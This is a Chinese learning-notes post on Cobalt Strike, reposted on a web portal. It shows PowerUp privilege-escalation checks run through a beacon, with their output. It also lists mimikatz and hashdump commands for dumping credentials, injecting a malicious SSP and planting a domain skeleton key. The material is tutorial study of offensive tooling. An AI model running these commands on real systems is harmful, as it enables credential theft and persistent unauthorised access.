CS学习笔记 | 14、powerup提权的方法

雪夜
发布: 2025-07-22 08:04:01
原创
942人浏览过

0x00 介绍

powerup 所做的事是寻找可能存在弱点的地方,从而帮助提权。

利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。

0x01 PowerUp 的使用

执行以下命令:将 ps1 文件上传到目标主机,并执行所有弱点检查。

代码语言:javascript代码运行次数:0运行复制
<code class="javascript">powershell-import PowerUp.ps1powershell invoke-allchecks</code>
登录后复制

详细运行过程:

代码语言:javascript代码运行次数:0运行复制
<code class="javascript">beacon> powershell-import PowerUp.ps1[*] Tasked beacon to import: PowerUp.ps1[+] host called home, sent: 275084 bytesbeacon> powershell invoke-allchecks[*] Tasked beacon to run: invoke-allchecks[+] host called home, sent: 313 bytes[+] received output:[*] Running Invoke-AllChecks[+] Current user already has local administrative privileges![*] Checking for unquoted service paths...[*] Checking service executable and argument permissions...[+] received output:ServiceName                     : AeLookupSvcPath                            : C:Windowssystem32svchost.exe -k netsvcsModifiableFile                  : C:Windowssystem32ModifiableFilePermissions       : GenericAllModifiableFileIdentityReference : BUILTINAdministratorsStartName                       : localSystemAbuseFunction                   : Install-ServiceBinary -Name 'AeLookupSvc'CanRestart                      : True……内容太多,此处省略……[*] Checking service permissions...[+] received output:ServiceName   : AeLookupSvcPath          : C:Windowssystem32svchost.exe -k netsvcsStartName     : localSystemAbuseFunction : Invoke-ServiceAbuse -Name 'AeLookupSvc'CanRestart    : True……内容太多,此处省略……[*] Checking %PATH% for potentially hijackable DLL locations...[+] received output:Permissions       : GenericAllModifiablePath    : C:Windowssystem32WindowsPowerShell1.0IdentityReference : BUILTINAdministrators%PATH%            : %SystemRoot%system32WindowsPowerShell1.0AbuseFunction     : Write-HijackDll -DllPath 'C:Windowssystem32WindowsPowerS                    hell1.0\wlbsctrl.dll'……内容太多,此处省略……[*] Checking for AlwaysInstallElevated registry key...[*] Checking for Autologon credentials in registry...[*] Checking for modifidable registry autoruns and configs...[+] received output:Key            : HKLM:SOFTWAREMicrosoftWindowsCurrentVersionRunVMware Use                 r ProcessPath           : "C:Program FilesVMwareVMware Toolsmtoolsd.exe" -n vmusrModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:Program Files                 VMwareVMware Toolsmtoolsd.exe; IdentityReference=BUILTINA                 dministrators}……内容太多,此处省略……[*] Checking for modifiable schtask files/configs...[+] received output:TaskName     : GoogleUpdateTaskMachineCoreTaskFilePath : @{Permissions=System.Object[]; ModifiablePath=C:Program Files (               x86)GoogleUpdateGoogleUpdate.exe; IdentityReference=BUILTINA               dministrators}TaskTrigger  : <Triggers xmlns="http://schemas.microsoft.com/windows/2004/02/mi               t/task"><LogonTrigger><Enabled>true</Enabled></LogonTrigger><Cal               endarTrigger><StartBoundary>2020-04-11T21:47:44</StartBoundary><               ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></Ca               lendarTrigger></Triggers>……内容太多,此处省略……[*] Checking for unattended install files...UnattendPath : C:WindowsPantherUnattend.xml[*] Checking for encrypted web.config strings...[*] Checking for encrypted application pool and virtual directory passwords...[*] Checking for plaintext passwords in McAfee SiteList.xml files....[+] received output:[*] Checking for cached Group Policy Preferences .xml files....[+] received output:</code>
登录后复制

如果在自己的靶机上发现导入ps1文件失败,这可能是因为系统不允许执行不信任的脚本文件导致的。

这时为了复现成功可以来到靶机下,以管理员权限打开 Powershell,运行set-ExecutionPolicy RemoteSigned,输入Y回车,此时系统便能导入PowerUp.ps1文件了。

代码语言:javascript代码运行次数:0运行复制
<code class="javascript">PS C:WINDOWSsystem32> set-ExecutionPolicy RemoteSigned执行策略更改执行策略可帮助你防止执行不信任的脚本。更改执行策略可能会产生安全风险,如 https:/go.microsoft.com/fwlink/?LinkID=135170中的 about_Execution_Policies 帮助主题所述。是否要更改执行策略?[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): YPS C:WINDOWSsystem32></code>
登录后复制

在运行Invoke-AllChecks后,便会列出当前系统中可被提权的弱点之处,之后再执行检查结果中AbuseFunction下的命令便能开始提权操作了。

但是我在自己本地环境中并未复现成功,执行AbuseFunction后的命令只能创建一个与当前登录用户相同权限的账户,没能达到提权的目的。

Alkaid.art
Alkaid.art

专门为Phtoshop打造的AIGC绘画插件

Alkaid.art 153
查看详情 Alkaid.art

参考网上相关文章后也未果,这也是为什么这一节拖更这么久的原因,因此 PowerUp 的复现过程暂时就没法记录了。

如果正在看本篇文章的你有过使用 PowerUp 提权成功的经历,欢迎留言分享。

0x02 获取凭证和哈希

想要获取凭证信息,可以在管理员权限的会话处右击选择Access --> Dump Hashes,或者在控制台中使用hashdump命令。

CS学习笔记 | 14、powerup提权的方法

想获取当前用户的密码,可以运行mimikatz,右击管理员权限会话选择Access --> Run Mimikatz,或在控制台运行logonpasswords命令。

CS学习笔记 | 14、powerup提权的方法

View --> Credentials下可以查看到hashdumpmimikatz获取的数据。

0x03 Mimikatz

在 Beacon 中集成了 mimikatz ,mimikatz 执行命令有三种形式:

mimikatz [module::command] <args></args>运行 mimikatz 命令mimikatz [!module::command] <args></args>强制提升到 SYSTEM 权限再运行命令,因为一些命令只有在 SYSTEM 身份下才能被运行。mimikatz [@module::command] <args></args>使用当前 Beacon 的访问令牌运行 mimikatz 命令

下面是一些mimikatz命令。

!lsadump::cache获取缓存凭证,默认情况下 Windows 会缓存最近10个密码哈希!lsadump::sam获取本地账户密码哈希,该命令与 hashdump 比较类似misc::cmd如果注册表中禁用了 CMD ,就重新启用它!misc::memssp注入恶意的 Windows SSP 来记录本地身份验证凭据,这个凭证存储在“C:windowssystem32mimilsa.log”中misc::skeleton该命令仅限域内使用。该命令会给所有域内用户添加一个相同的密码,域内所有的用户都可以使用这个密码进行认证,同时原始密码也可以使用,其原理是对 lsass.exe 进行注入,重启后会失效。process::suspend [pid]挂起某个进程,但是不结束它process::resume [pid]恢复挂起的进程

以上就是CS学习笔记 | 14、powerup提权的方法的详细内容,更多请关注php中文网其它相关文章!

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号